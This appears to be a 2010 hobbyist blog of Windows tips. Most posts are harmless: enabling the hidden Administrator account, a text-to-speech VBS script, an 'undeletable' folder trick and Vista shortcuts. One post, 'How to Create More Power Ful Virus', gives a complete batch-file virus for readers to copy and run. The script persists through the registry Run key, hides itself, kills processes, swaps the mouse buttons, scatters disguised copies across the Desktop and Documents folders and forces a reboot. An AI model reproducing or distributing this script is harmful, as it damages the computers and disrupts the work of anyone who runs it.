Monday, March 29, 2010

Enable the (Hidden) Administrator Account on Windows 7 or Vista

Many people familiar with prior versions of Windows are curious what happened to the built-in Administrator account that was always created by default. Does this account still exist, and how can you access it?

The account is created in Windows 7 or Vista, but since it’s not enabled you can’t use it. If you are troubleshooting something that needs to run as administrator, you can enable it with a simple command.

Note: You really shouldn’t use this account for anything other than troubleshooting. In fact, you probably shouldn’t use it at all.

Enable Built-in Administrator Account

First you’ll need to open a command prompt in administrator mode by right-clicking and choosing “Run as administrator” (or use the Ctrl+Shift+Enter shortcut from the search box)

Now type the following command:

net user administrator /active:yes

You should see a message that the command completed successfully. Log out, and you’ll now see the Administrator account as a choice. (Note that the screenshots are from Vista, but this works on Windows 7)

You’ll note that there’s no password for this account, so if you want to leave it enabled you should change the password.

Disable Built-in Administrator Account

Make sure you are logged on as your regular user account, and then open an administrator mode command prompt as above. Type the following command:

net user administrator /active:no

The administrator account will now be disabled, and shouldn’t show up on the login screen anymore.

Sunday, February 28, 2010

Make your pc speak whatever you type[VBS Trick]

Now you can create your own text to speech converter software to make your computer speak whatever you type. I found this script on some Vietnamese site. It’s pretty cool. Just run this script and make it read any funny sentence.Copy the code given below in notepad and save it as anyname.vbs. Make sure that you save it as .vbs file.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

After making a vbs file just double click on that file and type anything you want in the textbox.

Friday, February 26, 2010

How to make an undeletable folder

It probably happened once, that someone deleted a folder ,which is containing a few hundred files and was very important.If you’d like to avoid anything similar happening in future.You can protect your important folders by making them undeletable. Here is simple tip, which can help you. 1)Open cmd ( Type in Run option cmd or navigate to All Programs->Accessories-> Command Prompt) 2)In cmd change to the directory that you want,I change to E.Just type E: and enter.If you don´t know how change directories with Cmd, here is post where I wrote about it.
3)Type md \lpt1\\ and press enter, the folder will now in your E:
4)If you try to delete or rename it, it will appear error message

How to delete undeletable folder?

Just go to cmd Navigate to the directory and type in rd \lpt1\\


Thursday, February 25, 2010

How to Create More Power Ful Virus

Copy & Paste this code in Note-Pad and save virus.bat.

@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP

How to create a Password Protected Folder

Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.

Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.

Step-3: Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.

Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.

Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.

Step-6: Now goto the File menu and select the option Add a password.

ie: File -> Add a password

Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.

7 Interesting Quick-Tips for Windows Vista

In this post, I will be showing you 7 interesting and quick things that you can do with your Windows Vista. Hope you like them. The 7 things that you can learn from this video are: i) How to make checkbox selections in windows explorer, ii) How to quick-search through a folder, iii) Learn to resize Desktop Icons, iv) How to use shortcut hotkeys for accessing various programs, v) The easier way to access comand prompt, vi) How to activate the ‘RUN’ command in Start Menu and vii) How to do a Vista cleanup after installing SP1.


i) How to make check box selections in windows explorer - This will allow you to select all the items you want from a folder without having to hold the Ctrl or Shift keys.
  • Go to Control Panel in Classic View -> Folder Options -> View Tab -> Select ‘Use check boxes to select Items’ OR
  • Go to Start -> Computer -> Press Alt -> Tools -> Folder Options -> View Tab -> Select ‘Use check boxes to select Items’

ii) How to quick-search through a folder - Tired of clicking folder after folder searching for a particular file ? Well this tip can help you do a quick search on the folder you are on in order to get that file.

  • Go to Control Panel in Classic View -> Folder Options -> View Tab -> Select ‘Automatically type into the search box’ under ‘When typing into list view’ OR
  • Go to Start -> Computer -> Press Alt -> Tools -> Folder Options -> View Tab -> Select ‘Automatically type into the search box’ under ‘When typing into list view’

iii) Learn to resize Desktop Icons - Lots of people have asked me how to either increase or decrease the size of desktop icons easily to bypass the windows default. Its very easy actually. In order to resize the icons to the 3 default sizes that windows vista provides, just right click on the desktop, go to View and you will see Large Icons, Medium Icons and Classic Icons. If you want to resize the icons more than or less than these defaults, all you have to do is hold the Ctrl button and scroll up/down untill you are happy with the size of the icons.

iv) How to use shortcut hotkeys for accessing various programs - You want to click a predifined set of keys to open up a program ? Very simple… All you have to do is right click on the shortcut icon to that program wich is on your desktop and go to Properties. You have to now go to the Shortcut Tab and you will see an option which says Shortcut Key. Just enter whatever set of keys you want to press to activate that program and apply. Voila, now when you click that combination of keys, the program starts.

v) The easier way to access comand prompt - I always get tired of 1st going to the ‘Run’ command, entering ‘cmd’ and then going to the folder whichever i wanted to go to on the command prompt. But I found out that there is a much easier way to do this. All you have to do is go to the folder you want your command prompt to show up as, hold Shift and right click. You will now get an option saying ‘Open Command Window Here’.

vi) How to activate the ‘RUN’ command in Start Menu - Tired of clicking the ‘Windows key and R’ to get to the Run Command ? Well, there is a very simple way to get that command on your Start Menu along with the Control Panel and My Computer etc. All you have to do is:

  • Start -> Right Click on any empty portion of the start menu to get the properties -> Customize -> Select ‘Run Command’ -> Ok -> Apply

vii) How to do a Vista cleanup after installing SP1 - Once you have installed Vista SP1 and you are certain that you wont uninstall it or downgrade back to Vista, you can do a cleanup of Windows Vista. All you have to do is go to Run command (’Windows Button + R’ or ‘Start -> Run’ after following Tip 6), and enter vsp1cln.exe

- God's Hacker